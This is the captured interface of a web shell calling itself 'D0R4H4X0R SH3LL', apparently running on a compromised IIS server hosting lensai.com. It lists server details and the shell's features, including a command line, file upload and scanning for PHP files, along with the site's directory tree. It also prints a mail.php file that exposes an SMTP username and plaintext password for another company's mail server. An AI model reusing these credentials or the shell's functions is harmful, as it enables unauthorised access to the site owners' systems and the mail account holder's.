D0R4H4X0R SH3LL

Server Information

Server: Microsoft-IIS/10.0
System: Windows NT BH-PLESK-WEB3 10.0 build 20348 (Windows Server 2022) AMD64
User: IWPD_8556(lensai) ( 0 )
PHP Version: 8.3.21
Python Version: Python is not available
Disabled Functions:, Cron, Curl, Ftp, GCC, Mail, Mysql, PKEXEC, Perl, Python, SendMail, Ssh, Wget, exec, passthru, shell_exec, system

Features

Command Line

Find Longest Directory Path

Scan New PHP Files

Upload File

Directory: D:/INETPUB/VHOSTS/lensai.com/httpdocs/new/

Current File : D:/INETPUB/VHOSTS/lensai.com/httpdocs/new/mail.php

 
<?php
require 'PHPMailerAutoload.php';
 
$mail = new PHPMailer;
 
$mail->isSMTP();                                      // Set mailer to use SMTP
$mail->Host = 'smtp.blackmeloncreative.com';                       // Specify main and backup server
$mail->SMTPAuth = true;                               // Enable SMTP authentication
$mail->Username = 'mail@blackmeloncreative.com';                   // SMTP username
$mail->Password = 'Design2005';               // SMTP password
$mail->SMTPSecure = 'tls';                            // Enable encryption, 'ssl' also accepted
$mail->Port = 465;                                    //Set the SMTP port number - 587 for authenticated TLS
$mail->setFrom('mail@blackmeloncreative.com', 'Sanjay Dhamecha');     //Set who the message is to be sent from
$mail->addReplyTo('mail@blackmeloncreative.com', 'First Last');  //Set an alternative reply-to address
$mail->addAddress('mail@blackmeloncreative.com', 'Josh Adams');  // Add a recipient
$mail->addAddress('mail@blackmeloncreative.com');               // Name is optional
$mail->addCC('cc@example.com');
$mail->addBCC('bcc@example.com');
$mail->WordWrap = 50;                                 // Set word wrap to 50 characters
$mail->isHTML(true);                                  // Set email format to HTML
 
$mail->Subject = 'Here is the subject';
$mail->Body    = 'This is the HTML message body <b>in bold!</b>';
$mail->AltBody = 'This is the body in plain text for non-HTML mail clients';
 
//Read an HTML message body from an external file, convert referenced images to embedded,
//convert HTML into a basic plain-text alternative body
$mail->msgHTML(file_get_contents('contents.html'), dirname(__FILE__));
 
if(!$mail->send()) {
   echo 'Message could not be sent.';
   echo 'Mailer Error: ' . $mail->ErrorInfo;
   exit;
}
 
echo 'Message has been sent';
 
admin DIR
Directory drwxrwxrwx
B DIR
Directory drwxrwxrwx
Directory drwxrwxrwx
Directory drwxrwxrwx
css DIR
Directory drwxrwxrwx
fonts DIR
Directory drwxrwxrwx
images DIR
Directory drwxrwxrwx
js DIR
Directory drwxrwxrwx
s DIR
Directory drwxrwxrwx
.htaccess 0.118 KB
File -rw-rw-rw-
active.js 0.514 KB
File -rw-rw-rw-
admin.php 0.043 KB
File -rw-rw-rw-
blog.php 3.993 KB
File -rw-rw-rw-
blogs.php 3.755 KB
File -rw-rw-rw-
brochures.php 1.764 KB
File -rw-rw-rw-
brochures1.php 7.628 KB
File -rw-rw-rw-
File -rw-rw-rw-
File -rw-rw-rw-
File -rw-rw-rw-
File -rw-rw-rw-
File -rw-rw-rw-
File -rw-rw-rw-
File -rw-rw-rw-
File -rw-rw-rw-
File -rw-rw-rw-
contact.php 3.646 KB
File -rw-rw-rw-
controller.php 2.763 KB
File -rw-rw-rw-
counter.txt 0.003 KB
File -rw-rw-rw-
demo.php 19.660 KB
File -rw-rw-rw-
error_log 266.786 KB
File -rw-rw-rw-
footer.php 4.770 KB
File -rw-rw-rw-
header.php 5.879 KB
File -rw-rw-rw-
header1.php 5.216 KB
File -rw-rw-rw-
img.php 6.316 KB
File -rw-rw-rw-
index.php 4.650 KB
File -rw-rw-rw-
login.php 0.582 KB
File -rw-rw-rw-
mail.php 1.813 KB
File -rw-rw-rw-
paper.php 2.691 KB
File -rw-rw-rw-
product.php 10.401 KB
File -rw-rw-rw-
product1.php 13.077 KB
File -rw-rw-rw-
product_s.php 13.210 KB
File -rw-rw-rw-
producticon.php 5.646 KB
File -rw-rw-rw-
File -rw-rw-rw-
project.php 2.915 KB
File -rw-rw-rw-
project1.php 1.020 KB
File -rw-rw-rw-
temp.php 2.407 KB
File -rw-rw-rw-
test.html 0.006 KB
File -rw-rw-rw-
video.php 3.145 KB
File -rw-rw-rw-
web.config 1.730 KB
File -rw-rw-rw-
D0R4H4X0R SH3LL